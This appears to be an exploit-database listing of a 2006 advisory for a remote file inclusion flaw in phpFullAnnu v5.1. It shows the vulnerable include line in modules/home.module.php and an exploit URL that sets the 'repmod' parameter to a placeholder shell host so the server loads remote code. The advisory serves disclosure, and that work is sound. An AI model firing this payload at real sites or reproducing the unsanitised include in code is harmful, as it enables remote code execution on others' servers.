header-logo
Suggest Exploit
vendor:
phpFullAnnu
by:
SHiKaA
N/A
CVSS
N/A
Remote File Inclusion
98
CWE
Product Name: phpFullAnnu
Affected Version From: v5.1
Affected Version To: v5.1
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

phpFullAnnu <= v5.1 (repmod) Remote File Inclusion Exploit

A vulnerability exists in phpFullAnnu v5.1, due to improper validation of user-supplied input in the 'repmod' parameter of the 'modules/home.module.php' script. An attacker can exploit this vulnerability to execute arbitrary PHP code on the vulnerable system by supplying a malicious URL in the 'repmod' parameter.

Mitigation:

Input validation should be performed to ensure that user-supplied input is properly sanitized.
Source

Exploit-DB raw data:

#==============================================================================================
#phpFullAnnu <= v5.1 (repmod) Remote File Inclusion Exploit
#===============================================================================================
#                                                                       
#Critical Level : Dangerous                                             
#                                                                       
#Venedor site : http://pfa.netsliver.com/download/phpfullannu-v5.1.zip       
#                                                                       
#Version : v5.1                                             
#                                                         
#================================================================================================
#Bug in : modules/home.module.php
#
#Vlu Code :
#--------------------------------
#      include($repmod.'linksdirect.module.php');
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/modules/home.module.php?repmod=http://SHELLURL.COM?
#
#
#================================================================================================
#Discoverd By : SHiKaA
#
#Conatact : SHiKaA-[at]hotmail.com
#
#GreetZ : SiMooooo KACPER Rgod Timq XoRon MDX Bl@Ck^B1rd
# Special Thx To : Str0ke
==================================================================================================

# milw0rm.com [2006-09-06]